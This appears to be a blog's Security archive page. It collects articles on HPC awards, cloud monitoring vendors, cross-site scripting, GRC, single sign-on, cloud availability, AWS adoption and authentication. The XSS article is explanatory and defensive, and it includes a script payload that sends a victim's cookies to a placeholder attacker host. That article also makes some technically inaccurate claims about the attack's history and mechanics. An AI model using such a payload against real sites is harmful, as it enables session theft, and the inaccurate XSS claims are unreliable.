Category Archives: Security

International Data Corporation (IDC) Lauds Innovations in Supercomputing with Innovation Excellence Awards

FRANKFURT, Germany, June 21, 2016 – International Data Corporation (IDC) today announced the tenth round of recipients of the HPC Innovation Excellence Award at ISC16, a major international supercomputing conference, in Frankfurt, Germany. This year’s winners include The Centre for Computational Medicine, University of Toronto; Walt Disney Animation Studios; DreamWorks Animation; Fortissimo/Ergolines GPUdb; United States Postal Service; Novartis/Amazon Web Services (AWS)/Cycle Computing; and the University of Rochester Medical Center. They join the elite ranks of over 60 previous recipients from around the world, the first having been announced in 2011.

The HPC Innovation Excellence Award recognizes noteworthy achievements by users of high performance computing technologies. The program’s main goals are to showcase return on investment (ROI) and scientific success stories involving HPC; to help other users better understand the benefits of adopting HPC and justify HPC investments, especially for small and medium-size enterprises (SMEs); to demonstrate the value of HPC to funding bodies and politicians; and to expand public support for increased HPC investments.

“IDC research has shown that HPC can accelerate innovation cycles greatly and in many cases can generate return on investment. The ROI program aims to collect a large set of success stories across many research disciplines, industries, and application areas,” said Earl C. Joseph, Ph.D., IDC’s program vice president for High-Performance Computing (HPC) and executive director of the HPC User Forum. “The winners achieved clear success in applying HPC to greatly improve business ROI, scientific advancement, and/or engineering successes. Many of the achievements also directly benefit society.”

Read Full Release: IDC

15 Cloud Data Performance Monitoring Companies

Cloud Data Performance Monitoring Companies

(Updated: Originally published Feb 9th, 2015) We have put together a short list of some of our favorite cloud performance monitoring services. In this day and age it is extremely important to stay on top of critical issues as they arise, and these services will help you monitor your data and safeguard critical applications and websites in real time. This list is in no particular order of preference; when selecting a new service, please do your own due diligence.



CopperEgg has been in business since 2010 and has made a good name for itself, securing clients such as Juniper Networks, RealNetworks and SEGA. Features include the ability to monitor server CPU processes, receive real-time alerts, and collect, analyze, and alert on any metric.



DataDog is a startup based in New York that recently secured $31 million in Series C funding. They are quickly making a name for themselves and have a truly impressive client list that includes Adobe, Salesforce, HP, Facebook and many others.



Keynote has been around since 1995 and has an impressive client list that includes Akamai, AT&T, BBC, IBM, SAP and many others. Keynote solutions test from the user perspective, delivering high-volume traffic on demand and accurately modeling interaction, arrival patterns, and geographic diversity.



Kaseya Traverse has been in business since 2000 and offers a cloud and service-level management platform with proactive monitoring and powerful root-cause analytics for all aspects of the IT environment: applications, databases, network infrastructure, cloud services, servers, data center equipment and VoIP. They have several case studies and a large client list that includes Staples, the University of Kentucky and Virginia Tech.



Soasta was founded in 2006. They provide seamless integration of test design, monitoring, and reporting for high-quality web applications and services. Their client list includes Hallmark, Microsoft and Nordstrom, among many others.



Up.time began in 2002 and provides deep server monitoring that tracks the performance of critical applications, databases, web servers, network devices, and critical system-level services. You can choose from any of up.time’s built-in server and application monitors, or quickly define your own custom probes. Their impressive client list includes Cisco, NASA, Sony, Ford and many other high-profile brands.

SolarWinds

SolarWinds has been in business since 1999. Their services can monitor all the infrastructure in your data center using WMI, SNMP, CIM, JMX and VMware® API protocols. Their client list includes a large number of government agencies, most notably the NSA, U.S. Army and Department of Homeland Security.



Monitis has been in business since 2006 and their client list includes AVIS, SurveyMonkey, Stanford University and the University of Cambridge. They offer a Universal Cloud Monitoring Framework that syncs with cloud computing providers such as Rackspace, GoGrid, SoftLayer and many more, automating monitoring in highly dynamic cloud environments.



Opsview has been in business since 2002. Opsview provides advanced auto-discovery and an integrated GUI with quick, straightforward configuration. Their clientele includes Active Networks, Cornell University and MIT.



Apica was formed in 2005. Apica offers companies and developers cloud-based load testing and web performance monitoring tools to test applications for maximum capacity, daily performance, improved load times, and protection from peak loads, letting you analyze online performance and pinpoint bottlenecks quickly and effectively. Their partners include Rackspace, RightScale, AWS and many others.



LoadStorm has been offering SaaS products since 1999. Their load testing service lets web developers see how their applications respond under heavy volumes of HTTP traffic. LoadStorm puts massive cloud resources in the hands of web developers to help them improve the performance of their web applications. You can create your own test plans and generate up to 50,000 concurrent users in realistic scenarios.



CloudHarmony is relatively new in comparison to its counterparts. Formed in 2009, they have been developing some very useful tools. You can use their extensive and continuously updated benchmarks to view and compare performance metrics from various cloud providers and services. One of our favorite areas is the useful Cloud Square provider directory.

Amazon CloudWatch

Part of the highly cost-efficient Amazon Web Services (AWS) group, CloudWatch is a fairly basic, though very dynamic, tool that collects, monitors and tracks customizable data metrics. The dashboards are interactive, allowing you to change categorizations and metrics manually through a very accessible API.
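
As a concrete illustration of pushing a custom metric into CloudWatch, here is a minimal sketch using the boto3 Python SDK; the namespace, metric name, and dimension are hypothetical examples, not part of the article.

```python
# Minimal sketch: publishing a custom metric to Amazon CloudWatch with boto3.
# The namespace, metric name, and dimension below are illustrative assumptions.
import boto3

cloudwatch = boto3.client("cloudwatch", region_name="us-east-1")

cloudwatch.put_metric_data(
    Namespace="MyApp/Performance",          # hypothetical namespace
    MetricData=[
        {
            "MetricName": "RequestLatency", # hypothetical metric
            "Dimensions": [{"Name": "Environment", "Value": "production"}],
            "Value": 142.0,                 # latency observed by the app
            "Unit": "Milliseconds",
        }
    ],
)
```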

Oracle Cloud

Oracle Cloud utilizes a complex interchange of software to provide insights on actual, applicable data flow. It is a flexible tool that can provide massive insight with any set of data. Oracle offers “experts in every industry” and is truly well-rounded, reaching 110 million households and extracting data from 1,500 partners.


SevOne boasts ‘user friendliness’ with the ability to view metric, flow, and log data all in a single dashboard. With alliances like Cisco and Dell, SevOne is far-reaching, spanning networks, 4G LTE, and the “Hybrid Cloud” to standardize cloud infrastructure and alleviate visibility-gap risk. In 2013, SevOne received a $150 million investment from Bain Capital, and in both 2015 and 2016 it received various awards for business promise and software success.

By Glenn Blake

Cross-Site Scripting – Why Is It A Serious Security Threat For Big Data Applications?

Security Threat And Big Data Applications

IBM, Amazon, Google, Yahoo, Microsoft – and the list goes on. All of these leading IT enterprises have been affected by Cross-Site Scripting (XSS) attacks in the past. Cross-Site Scripting ranks third in the top-10 list of web application vulnerabilities published by the Open Web Application Security Project (OWASP) – a worldwide non-profit community focused on improving the security of web applications.

What is Cross-Site Scripting?

The history of the ‘Cross-Site Scripting’ vulnerability dates back to the mid-1990s. Microsoft first introduced the term to refer to a security flaw specific to the ASP.NET environment that made dynamically generated HTML pages vulnerable to malicious scripting attacks.

Cross-Site Scripting (XSS) can be defined as the process of inserting malicious code into a web environment to compromise the security of the system. It is a client-side attack in which an attacker injects specially crafted scripts through a web browser. Because the code appears to have originated from a trusted source, the browser executes the script – resulting in the attacker gaining access to the system. A host of scripting languages, including JavaScript, VBScript, Flash and HTML/CSS, can be used to launch XSS attacks on vulnerable web-based systems and applications.
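
To make the attack concrete, here is a minimal sketch (in Python, with hypothetical names) of the vulnerable pattern described above: user input interpolated into a page without validation, so the browser would execute the injected script.

```python
# Minimal sketch of the vulnerable pattern: user input dropped straight into HTML.
# All names here are illustrative, not from the article.

def render_comment(comment: str) -> str:
    # VULNERABLE: the input is trusted and interpolated verbatim.
    return f"<div class='comment'>{comment}</div>"

# A malicious "comment" that a browser would execute as script:
payload = "<script>document.location='https://evil.example/?c='+document.cookie</script>"
print(render_comment(payload))
```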

How Does Cross-Site Scripting Relate to Big Data Projects?

Cross-Site Scripting is a web-based vulnerability that can affect any Big Data project that uses web-based systems, tools or applications. As most data analytics and business intelligence applications are interactive web-based solutions that accept and execute user inputs, there is always the possibility of cross-site scripting attacks if those inputs are executed without validation.


Web-based applications continue to fall prey to Cross-Site Scripting attacks because they are mostly interactive: they need to accept inputs from users and return output based on the inputs received. This gives an attacker the opportunity to manipulate the inputs and insert malicious scripts or commands through normal input channels.

Cross-Site Scripting – Behind the Scenes:

Cross-Site Scripting attacks mainly exploit authentication bugs in the application layer to insert scripts that are executed on the client side. Typically the attack vector relies on brute force to hijack legitimate user sessions. Such attacks bypass access control policies to let the attacker assume the identity of a valid user, and cross-site scripting can even help a hacker gain administrative control of the application server – compromising the security of the entire environment.

The risk of XSS is not limited to Big Data applications alone; all types of web-based solutions are vulnerable to cross-site scripting attacks. By injecting malicious executable scripts into the application layer, a hacker can gain control of underlying databases, user credentials and other sensitive information maintained by the application. Information gathered from the initial attack can subsequently be used to conduct more sophisticated attempts to compromise the security of the entire project.

How to Prevent Cross-Site Scripting Attacks

Contextual Input Encoding (Escaping) Techniques:

Escaping techniques, if implemented correctly, can significantly reduce the risk of XSS attacks. Escaping is a form of contextual encoding in which the web browser is instructed to treat specific strings of code as plain text characters.

If an attacker manages to insert an executable script as input to the application, the escaped output is treated as plain text: the browser renders the matching strings harmlessly instead of executing them as a script.

HTML, CSS and JavaScript all have their own sets of escaping libraries. Instead of rolling your own escaping code, it is better to use a reputable escaping library.
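
As an illustration, here is a minimal sketch of the idea using Python’s standard html.escape function as a stand-in for such an escaping library; the rendering function is a hypothetical example.

```python
# Minimal sketch of HTML-context escaping using Python's standard library,
# standing in for the reputable escaping libraries recommended above.
from html import escape

def render_comment_safely(comment: str) -> str:
    # escape() converts <, >, &, and quotes into HTML entities, so the
    # browser renders the payload as plain text instead of executing it.
    return f"<div class='comment'>{escape(comment, quote=True)}</div>"

payload = "<script>alert('xss')</script>"
print(render_comment_safely(payload))
# <div class='comment'>&lt;script&gt;alert(&#x27;xss&#x27;)&lt;/script&gt;</div>
```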

Vulnerability Scanner:

Quite a few reputable security software vendors offer vulnerability scanner suites that can detect possible XSS attack areas, and you should seriously consider getting one for your project. The scanner crawls the entire set-up, consolidates its findings and lists the weak areas that are susceptible to cross-site scripting attacks.

Penetration Testing:

Another effective measure for identifying XSS vulnerabilities is penetration testing. Find the possible gateways through which an attacker could gain entry to the application and try to exploit those vulnerable areas yourself. If you succeed in breaking into the system, investigate further to find the root cause; once it is identified, you can engage your developers to come up with a preventive measure.

Browser Security Features:

All major web browsers honor security-related HTTP response headers that can be used to combat XSS attacks. You can use the Content-Security-Policy header to specify how the browser should deal with script tags, enabling execution of scripts from specific domains while blocking it for all others. This technique is also known as whitelisting.
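
As an illustration, here is a minimal sketch of setting the Content-Security-Policy response header, using the Flask framework as an assumed example; the whitelisted CDN domain is hypothetical.

```python
# Minimal sketch: attaching a Content-Security-Policy header in Flask.
# The allowed CDN domain is a hypothetical example.
from flask import Flask

app = Flask(__name__)

@app.after_request
def set_csp(response):
    # Allow scripts only from this site and one trusted CDN; block all others.
    response.headers["Content-Security-Policy"] = (
        "default-src 'self'; script-src 'self' https://cdn.example.com"
    )
    return response

@app.route("/")
def index():
    return "<h1>Hello</h1>"

if __name__ == "__main__":
    app.run()
```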

By Jack Danielson

Jack is a tech enthusiast, geek and writer. He is particularly interested in the proliferation of Big Data tips and tricks around the web. He holds the position of consultant writer at Satellite Broadband ISP, a resource site that helps people living in rural areas find high-speed satellite Internet service providers in their area, such as Wilblue Exede and HughesNet Gen4.

Adopting A Cohesive GRC Mindset For Cloud Security

Cloud Security Mindset

Businesses are becoming wise to the compelling benefits of cloud computing. When adopting cloud, they need a high level of confidence in how it will be risk-managed and controlled, to preserve the security of their information and the integrity of their operations. Cloud implementation is often built up over time in a business, while the technology and cybersecurity around it constantly evolve. This can leave businesses with a fragmented approach to cloud control and security, and that needs to be avoided through the implementation of a cohesive governance, risk and compliance (GRC) framework.

Cloud services are big business: IDC predicts that worldwide spending on public cloud services will reach $141 billion in 2019, while last year Amazon Web Services achieved net sales of $7.88 billion. Businesses get on board with cloud to perform better and to meet targets and objectives by being leaner, faster and more cost-effective.

Cloud helps businesses minimize the capital investment and maintenance costs of hardware and infrastructure. It supports rapid scaling up and down as needs dictate and brings elasticity to business operations, facilitating the addition and removal of user access more quickly and easily. Project deployment with cloud can be a more agile and faster affair. Efficient business operations are supported through improved access and information retrieval, while disaster recovery measures include robust backup and controls.

Being clear on risk

In the early days of cloud there were security concerns. It seemed to follow that assets residing ‘somewhere else’ were more at risk. Ownership and control of infrastructure gives a perception of security. However, the walls of a data center can be vulnerable to professional hackers, therefore it doesn’t automatically follow that infrastructure ownership provides greater security.


Cloud is a service-based delivery model, typically involving an infrastructure provider, a platform provider and a software provider. While procuring an IT solution as a service delivers benefits, it also comes with risks of its own, including shared technology issues, the risk of insufficient due diligence and service reliability. And of course, it is not immune to the threat of data breaches, other potential security issues or data loss.

Clarity on the division of labor between company and service provider is an essential first checkpoint of a robust cloud service model: what are you responsible for, and what is the service provider responsible for? This covers situations such as incident handling and virus infection on storage. Who manages such situations, should they arise, depends on the chosen service model, and this needs to be completely clear and transparent. There is nothing more valuable to a business than its data; its protection cannot be only half understood, and governance around all aspects is essential.

Secure cloud service provision

The right cloud architecture is a second critical consideration. Virtualization was the first phase of cloud adoption; now, isolation of data is also imperative. While multi-tenant solutions were adopted first, the call is now for multi-instance architectures to guarantee separation of company data. This is important because some regulation requires proof of data segregation, and it also provides greater flexibility with faster implementation of changes.

A cloud solution should also provide federated identity management so that the business has control over the access its users and devices have. As users move around the organization, the system needs to manage segregation of duties reliably.

For continuous security assurance, quarterly or monthly testing is not enough. Real-time dashboards are needed and should be a part of the service model.

Cloud service providers are now adopting industry standard GRC solutions that include segregation of duties, change management, continuous monitoring and reporting and analytics. For best practice secure cloud implementation, businesses should start with a robust GRC framework, assess cloud service providers meeting industry standards against that framework, and then ensure governance and control through service level agreements and continuous monitoring.

The GRC framework


For a single source of truth on regulatory compliance, security and control, the company’s GRC framework should apply across the complete cloud infrastructure and cover:

  • Continuous system controls monitoring – as business data and applications are mission-critical
  • Penetration testing and audit management – conducted to a defined schedule
  • Incident response management – this is the norm with internally controlled assets and there should be no difference with cloud implementation; the process needs to detail response activities that kick in immediately in the event of a security problem
  • Compliance controls testing – the specifics will depend on the industry, as particular requirements apply in the likes of healthcare and finance
  • Disaster recovery and business continuity – this is about more than demonstrating disaster recovery on paper; the theory needs to be tested through disaster recovery operations
  • Onsite and offsite backup audits – on a regular basis

In addition, a comprehensive GRC framework will also cover data encryption audits, forensics log management and reporting, elasticity and load tolerance testing, advanced cyberattack prevention measures and advanced cloud security analytics.

Resilience and control

Effective governance and control is integral to business success and growth. A risk-managed company is more resilient to market and situational change. The culture and practice of risk management and control has to come from the top down, permeating the organization’s entire operations. As well as defining and enforcing the policies for complete cloud implementation across all instances and cloud providers, the GRC framework should also serve as the template against which future providers can be evaluated.

With a GRC framework for cloud, businesses can expect enhanced information security, compliance and risk management; the highest levels of reliability and operational control; and continuous transparency and confidence. Business continuity will be robust, with disaster recovery measures in place and regulatory mandates complied with.

GRC on the cloud is a way of ensuring security risks are completely understood, and that management through manual processes and firefighting in the event of an incident are avoided. It is also a way of smoothly managing change when business decisions require it.

The right GRC approach will support informed decision-making and ongoing management, putting your business in a better position to reduce risk and to realize the benefits of cloud in enhancing business performance.

By Vidya Phalke, Chief Technology Officer at MetricStream

Cloud Access Management: Access Everywhere

Cloud Access Management

As cloud applications have become standard in nearly every industry, solutions are needed to help manage them. One way for admins to effectively manage their organization’s applications is to use an automated account management solution for both in-house and cloud applications. This eases provisioning, changing and de-provisioning user accounts, while maintaining security through correct access rights.

While this ensures ease of use for account admins, what about the end users? They also need a way to easily manage and access their cloud applications. Think about a user who works with numerous applications on a daily basis: they need to open a new page for each application and then sign in. In today’s work environment, in virtually every industry, employees frequently access work applications outside of the company network. While this might not be much of an inconvenience in the office, for those working on the go it can be extremely annoying. Solutions are available that allow users to easily manage and access their applications from any location.

How does it work?

A web-based single sign-on (SSO) solution is one method end users can use to easily handle cloud applications. Users access a portal where all of the applications available to them are presented; they provide a single set of credentials for authentication and can then open any of their applications simply by clicking its icon. This allows them to access their applications from one place, wherever they are working, whether inside or outside the company’s network.

This is extremely convenient for users on mobile devices. Think of an employee who is quickly trying to gain access on a smartphone or tablet: opening each application in a new tab and entering credentials is an extremely time-consuming process. Many vendors offer an app for the user’s device that prompts for a single set of credentials to reach the portal where all of their applications are available. For users who are on the go with tablets or smartphones this can be a tremendous help: they can access what they need, from anywhere, at any time, without being inconvenienced.

A cloud SSO solution is helpful in many different types of organizations. In education, students complete a large majority of their work outside of the school’s network and often use many mobile devices. In healthcare, clinicians go room to room visiting patients; sometimes caregivers log into terminals, other times they use a tablet and need to quickly access the applications and systems they need. A sales associate at a large organization may meet customers at their offices or other locations and need access to customer information. Many industries nowadays have employees who do not work from one single computer and need quick, convenient access.

How Can This Actually Enhance Security?


A major concern of every organization when implementing any type of solution is security. While they want their employees to be more productive and to more easily perform tasks and access the resources they need, they don’t want this to interfere with the security of their network.

The first big concern people have with SSO solutions is that using only one set of credentials leaves the network unsecure. Think, though, about the user who has several sets of complex credentials for the multitude of applications they need: chances are they write them down or save them in their phones to remember these passwords. It is actually more secure to have a single set of credentials that the user can easily remember and does not need to write down.


If security is a top priority, this type of solution can be customized with additional levels of security measures. In some industries certain employees handle highly sensitive information, so security is the utmost concern. For example, for an employee in the financial department handling company or customer finances, it is very important to add additional security methods, while it may not be as important for the applications an intern uses. Depending on the level of security needed, different methods of authentication can be required.


For the user working in the financial department, the solution can be set up to require that they enter their credentials and then provide a second form of identification. This can be a one-time-use PIN, an access card, or a biometric method such as a fingerprint or face scan.

Cloud SSO solutions can also be customized to meet the needs of the many different groups and positions which many organizations have. For example, it is obvious that certain departments within the organization use different applications than others. The organization can easily add and delete applications for each group. They can also break down groups differently depending on their organizational needs. Different levels of employees within a department will probably need different access to systems and applications. The company can easily develop groups so that each employee only has the applications in their portal that they need.

Cloud single sign-on solutions allow employees to easily see which applications they have, and access them with a single click and one set of credentials. This improves efficiency and productivity while also keeping the organization happy by ensuring security.

By Dean Wiech

Cloud Services Providers – Learning To Keep The Lights On

The True Meaning of Availability

What is real availability? In our line of work, cloud service providers approach availability from the inside out, and in many cases some never make it past their own front door, given how challenging it is to keep the lights on at home, let alone account for factors outside of their control. But to effectively provide quality services with a focus on the customer, providers need to ensure availability from all perspectives; this is what we like to call real availability. Real availability captures the real user experience from end to end, including everything within our control (our infrastructure and network) and things outside of it (customer or third-party providers).

It’s not enough to consider only the factors within your own infrastructure that might lead to downtime or disruption. Even if you achieve 100 percent uptime within your own network, the services being used by the customer are only as good as the weakest point in the process. A hardware failure on the customer side or an outage at the internet service provider are all factors that impact the overall availability of the services. And while you should do all you can to avoid being the weak link, from a customer’s point of view a disruption is a disruption, regardless of the source.
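
One way to see why the weakest link dominates: for components that must all work in series, end-to-end availability is approximately the product of the individual availabilities. Here is a small sketch with hypothetical figures.

```python
# Minimal sketch: end-to-end ("real") availability of services in series is
# roughly the product of the component availabilities. Figures are hypothetical.
components = {
    "provider_infrastructure": 0.9999,  # 99.99% uptime
    "third_party_isp":         0.999,   # 99.9%
    "customer_hardware":       0.995,   # 99.5%
}

end_to_end = 1.0
for name, availability in components.items():
    end_to_end *= availability

print(f"End-to-end availability: {end_to_end:.4%}")  # ~99.39%
```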

Looking Through the Eyes of the Customer


By shifting your focus to see the situation as the customer sees it, and by providing a real-world view of their availability, cloud service providers can take the necessary steps to change the way the industry looks at and measures availability. To determine real availability for your customers, providers need to look at every incident that results in a customer disruption. In our experience, incidents in a customer’s network fall into one of the following four categories:

Service provider’s infrastructure – This includes any and all disruptions that occur on the service provider’s end, within their infrastructure.

Software on a service provider’s platform – Additional software programs from the service provider that experience a glitch or outage.

Third-party provider – Includes third-party solutions such as a customer’s internet service provider or your chosen data center management or hosting services provider.

The customer – When customers have internal network issues, authentication issues, or use the service provider’s offering in ways that impact their own service.

Moving From Supplier to Partner is Good Business

Where you come in is helping your customers manage the situation when those disturbances occur, including identifying the source. By considering all points of the process when identifying factors that could lead to downtime, you are proactively partnering with your customers. This partnership and transparency is critical to your customer relationships and will dramatically improve the customer experience.


Evolving your status from supplier to a partner dedicated to a customer’s success also makes good business sense. While many cloud providers focus on new customer and user acquisition, industry studies show acquisition can cost seven times more than customer retention. Broadening the focus to the real availability and health of a cloud service can pay off for providers in the long run.

By Allan Leinwand

Why Organizations Move To Amazon AWS

Maximization of Cloud Opportunities 

Sponsored series by CloudMGR

When linked with the correct choice of provider, visibility and control in the cloud provide organizations with security as well as cost savings, speed, agility, efficiency, and innovation. Amazon Web Services (AWS) is one such provider that allows for the maximization of cloud opportunities, promising scalability, the elimination of capital expenses, and low latency.

Why Organizations Move to AWS

Economics & Infrastructure

Pay-per-use models are attractive to both small startups and gigantic corporations, and significant cost savings are available for those with unique and individually defined computing needs. Moreover, AWS requires no investment in physical hardware or space due to their globally distributed data centers, and when implementing AWS, organizations benefit from enhanced performance and improved disaster recovery.


While AWS provides a self-service model, organizations typically don’t require the same quantity and level of IT staff. Tasks such as data center maintenance are managed by Amazon, and many organizations make use of management providers for superior optimization and governance.

Innovation through Responsiveness & Agility

Organizations are working hard to out-perform, out-deliver, and out-innovate their competitors, and with its majority cloud market share, Amazon is one of, if not the, fastest innovators in its space. Further, AWS lets companies develop and deploy applications quickly with instant access to nearly limitless computing power, enabling corporate innovation because companies running AWS can move faster and be more agile than their competitors.


Responsiveness and agility allow organizations to quickly increase capacity, reduce downtime, encourage rapid experimentation and innovation, and extend global reach.

Security

With security one of the biggest concerns in all of IT, Amazon holds a range of the most essential certifications, including HIPAA, PCI, ISO, and Sarbanes-Oxley. It also maintains separation of logical and physical access to data for further protection, and it’s unlikely that more than a handful of businesses around the world are able to match Amazon’s provisions.

Amazon’s data centers are distributed across the world, and multiple, independently operated data centers per region provide different failure domains, enhancing performance and improving disaster recovery.

5 Steps to Organization-Wide Visibility & Control of AWS

Though the drivers for AWS adoption are clear, organizations often fail to realize the promised benefits of cloud due to a lack of visibility and control of their cloud infrastructure at each stage of the adoption journey.

Craig Deveson, founder and CEO of CloudMGR, suggests a five-step plan for organization-wide visibility and control of AWS:


  1. Develop a visibility framework
  • Determine what’s actually running (see the sketch after this list).
  • Bring visibility to cloud consumption with tools such as the AWS console, the AWS API, and third-party billing and cost management tools.
  • Standardize which services are used so that business units can build on and adapt them.
  • Control shadow IT.
  2. Tap into the partner ecosystem
  • Use technology partner tools to simplify billing and cost management, set up a self-service portal, and perform optimization tasks.
  • Leverage the consulting partner network to perform migration tasks, develop governance practices, and outsource service management.
  3. Move culture from CapEx to OpEx
  • Because CapEx has long been the central budgeting mechanism for businesses, OpEx will require a change in thinking from IT and finance: establishing comfort with distributed access, resource responsibilities beyond IT, and avoiding “out of sight, out of mind” thinking.
  4. Create a governance structure
  • Maintaining compliance with best practices, corporate governance requirements, and security by corporate users and service providers is essential. Develop a usage and control policy, control risk with cloud governance, manage access and permissions, and review compliance via regular audits.
  5. Build self-service capability
  • To give teams the agility to experiment and be innovative, provide controlled access that lets team members manage their own resources. This includes on-demand access, automation tools, and cost control mechanisms.
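
As an illustration of the first step, “determine what’s actually running”, here is a minimal sketch that queries the AWS API for running EC2 instances using the boto3 Python SDK; the region and tag handling are illustrative assumptions.

```python
# Minimal sketch for step 1, "determine what's actually running",
# using the AWS API via boto3. Region and tag usage are illustrative.
import boto3

ec2 = boto3.client("ec2", region_name="us-east-1")

response = ec2.describe_instances(
    Filters=[{"Name": "instance-state-name", "Values": ["running"]}]
)

for reservation in response["Reservations"]:
    for instance in reservation["Instances"]:
        tags = {t["Key"]: t["Value"] for t in instance.get("Tags", [])}
        print(instance["InstanceId"], instance["InstanceType"],
              tags.get("Name", "<untagged>"))
```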


CloudMGR’s objective is to “give businesses the visibility and control required to get the most from their cloud” by connecting all of an organization’s important systems into a single platform. CloudMGR develops a visibility framework and allows the creation of a central control dashboard, supports the move from a CapEx to an OpEx culture with chargebacks and cost centers, and enables self-service capability through the CloudMGR White Label service. Making it easier for teams and leaders to understand cloud resource usage, CloudMGR recognizes that a move to the cloud doesn’t guarantee full exploitation of its many benefits, and so provides the tools companies need to achieve maximum operational efficiency from their cloud environments.


By Jennifer Klostermann

Do Not Rely On Passwords To Protect Your Online Information

Password Challenges 

Simple passwords are no longer safe to use online. John Barco, vice president of Global Product Marketing at ForgeRock, explains why it’s time the industry embraced more advanced identity-centric solutions that improve the customer experience while also providing stronger security.

Since the beginning of logins, consumers have used a simple username and password to secure their sensitive information across the Internet. This approach sufficed in the early days of ecommerce, but with the rampant growth of phishing and other fraudulent activity, it’s time for a new industry standard. For businesses everywhere, this need for change has raised important questions about how to protect sensitive information in a cost-effective manner, without diluting customer usability and convenience.

Everyone is on mobile, which calls for more security on-the-go

The mass adoption of mobile devices presents the most obvious need for greater online security control. The sheer number of mobile devices around the world means organizations can implement more robust two-factor or multi-factor authentication systems without having to worry about the high cost of providing the devices to consumers themselves. Under a two-factor authentication system, a traditional username and password remain the first step in identity verification, but users are then required to input a second authentication factor to further verify who they are. This typically involves sending a unique code or password to a user’s mobile device; the user must input this along with his or her credentials to be granted access. Multi-factor authentication systems such as the Apple iPhone TouchID add a biometric factor such as a fingerprint.
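
As an illustration of how such a unique code can be generated, here is a minimal sketch of a time-based one-time password (TOTP, RFC 6238) using only Python’s standard library; the shared secret is a hypothetical example, and real deployments should use a vetted library.

```python
# Minimal sketch of the "unique code" in two-factor authentication:
# a time-based one-time password (TOTP, RFC 6238) built from the standard library.
# The shared secret is a hypothetical example.
import base64, hashlib, hmac, struct, time

def totp(secret_b32: str, period: int = 30, digits: int = 6) -> str:
    key = base64.b32decode(secret_b32)
    counter = int(time.time() // period)          # 30-second time step
    msg = struct.pack(">Q", counter)
    digest = hmac.new(key, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                    # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))  # code the user types alongside their password
```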

Mobile-based authentication, which is gradually becoming the benchmark standard for online businesses, gives peace of mind to consumers. However, such authentication is not without its issues. Mobile devices are not always secure, and unfortunately, a growing volume of malware is specifically programmed to target them. Such malware can allow criminals to scrape verification codes directly from devices if the codes are sent over data networks. The impact of mobile-based authentication on the user experience is also a concern, as many consumers do not want to have to enter multiple passwords every time they access their online accounts.

Next-gen security goes biometric

Adding biometric layers such as fingerprint or facial recognition technology, or messaging-based authentication processes could be the answer to the woes of mobile-based authentication. Biometrics could further boost security, with minimal impact on the user experience. As pointed out in a recent Gartner report, “Smartphone devices can make use of network-based push notification services that provide a secure out-of-band authentication channel. Authentication servers send notifications via the smartphone OS vendor. These messages are routed to a preregistered device and awaken a local app that can further authenticate the user via contextual information, PIN/password or biometric method. After successful local authentication, the app notifies the requesting authentication service of success, which completes the out of band (OOB) loop.” High-end smartphones offer these capabilities, but until they are more widely available, biometric authentication is unfortunately unlikely to be a viable solution for the majority of consumers.

Another alternative is to add extra layers, such as push authentication, to the two-factor process; this increases security but does not impact the customer experience. When first-time consumers sign into a website that uses push authentication, they are asked to scan an on-screen Quick Response (QR) code with their mobile devices. This creates an ‘ID tether’ between users and their devices. The next time the user logs in, a push notification is sent to his or her device; all the user has to do is tap ‘approve’ in order to proceed. Importantly, these messages are sent over a different network, typically the cellular network, making interception by malware or other criminal monitoring of data activity extremely difficult.

Behavior-based monitoring will become an industry standard


End users’ demand for multifactor authentication has accelerated in recent months, and businesses are more aware of the threats posed by online criminal activity, which makes major news headlines almost daily. Multifactor authentication, however, still relies upon a lock and key approach to online security. This means that once someone is through the front door (i.e., they have gained entry to the account), there are usually no other obstacles between them and the sensitive data contained within. For these reasons the most forward-thinking organizations are looking to implement solutions that offer adaptive risk authentication and continuous security.

Adaptive risk authentication and continuous security provide an ongoing view of online security. This means that just because someone has gained access to an account, it does not follow that they have full and free access to the data within it. Adaptive risk authentication scores user behavior based on key criteria such as IP address, device ID, number of failed login attempts and more, to establish whether the behavior is consistent with established ‘normal’ user behavior patterns. Any deviation outside the norm results in a higher risk score, which triggers additional security questions, re-authentication or, if necessary, removal of the token assigned to the online session. Most importantly, the algorithms responsible for scoring each session run silently in the background; users are only made aware of them if their behavior is deemed suspicious. The user experience is not compromised in any way, despite the higher levels of security in place.
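
As an illustration of the scoring idea, here is a minimal sketch that rates a session against the criteria mentioned above; the weights and threshold are invented for the example, not any vendor’s actual algorithm.

```python
# Minimal sketch of adaptive risk scoring against the criteria listed above.
# Weights and thresholds are illustrative assumptions, not a vendor's algorithm.

def risk_score(session: dict, profile: dict) -> int:
    score = 0
    if session["ip_address"] not in profile["known_ips"]:
        score += 30                                # unfamiliar network
    if session["device_id"] != profile["usual_device_id"]:
        score += 30                                # unfamiliar device
    score += min(session["failed_logins"], 5) * 8  # repeated login failures
    return score

session = {"ip_address": "203.0.113.7", "device_id": "tablet-9", "failed_logins": 2}
profile = {"known_ips": {"198.51.100.2"}, "usual_device_id": "laptop-1"}

if risk_score(session, profile) > 50:
    print("step-up: ask additional security questions or re-authenticate")
```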

Usernames and passwords are not dead just yet. They will continue to have their place online for a while, but it is increasingly obvious that in isolation, they are no longer enough to keep sensitive information safe. Thankfully for consumers, advanced security such as multifactor authentication, adaptive risk and continuous security is on the horizon. Inevitably, even the most robust lock-and-key solutions will give way to more reliable behavior-based monitoring, as the fight to keep sensitive data secure online continues to evolve.

By John Barco

John Barco is vice president of Global Product Marketing at ForgeRock. John has 20+ years of experience building innovative products for enterprise customers, focusing on identity and access management for the last 12 years. Prior to joining ForgeRock, he served as Senior Director of Product Management for the Identity Management group at Sun. John has also held leadership positions at iPlanet, Silicon Graphics, NComputing, and IronKey. He holds a degree in industrial engineering from Missouri State University.
